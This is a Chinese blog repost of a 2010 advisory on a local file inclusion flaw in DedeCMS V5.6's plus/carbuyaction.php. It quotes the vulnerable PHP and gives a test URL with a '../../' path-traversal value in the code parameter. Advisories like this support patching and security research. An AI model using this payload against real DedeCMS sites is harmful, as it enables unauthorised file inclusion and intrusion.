织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞

2010年6月27日热度：211 ℃ 发表评论阅读评论

发布时间:2010-06-20
影响版本:

DedeCmsV5.6

漏洞描述:
DedeCMS内容管理系统软件采用XML名字空间风格核心模板：模板全部使用文件形式保存，对用户设计模板、网站升级转移均提供很大的便利，健壮的模板标签为站长DIY 自己的网站提供了强有力的支持。

<?php
require_once (dirname(__FILE__) . "/../include/common.inc.php");
define('_PLUS_TPL_', DEDEROOT.'/templets/plus');
require_once DEDEINC.'/dedetemplate.class.php';
require_once DEDEINC.'/shopcar.class.php';
require_once DEDEINC.'/memberlogin.class.php';

if($cfg_mb_open=='N')
{
        ShowMsg("系统关闭了会员功能，因此你无法访问此页面！","javascript:;");
        exit();
}

$cfg_ml = new MemberLogin();

if(!isset($dopost) || empty($dopost)){   //只要$dopost不为空就行，By：俺是农村的。
        ...
}elseif($dopost == 'return'){
        require_once DEDEINC.'/payment/'.$code.'.php';  //变量$code未初始化，By：俺是农村的。
        $pay = new $code;
        $msg=$pay->respond();
        ShowMsg($msg,"javascript:;",0,3000);
        exit();
}
?>

测试方法:

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

http://www.ssvdb.com/plus/carbuyaction.php?dopost=return&code=../../

安全建议:

厂商补丁：
DedeCMS
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
http://www.dedecms.com/

声明: 本文采用 BY-NC-SA 协议进行授权. 转载请注明转自: 织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞

Javascript系列教程：面向对象讲解（一）Google 爬虫又学了一招：理解 JavaScript 代码

评论 (0) Trackbacks (0) 发表评论 Make a trackback

本文目前尚无任何评论.

本文目前尚无任何 trackbacks 和 pingbacks.

织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞

Dedecms, Dedecms漏洞, 织梦漏洞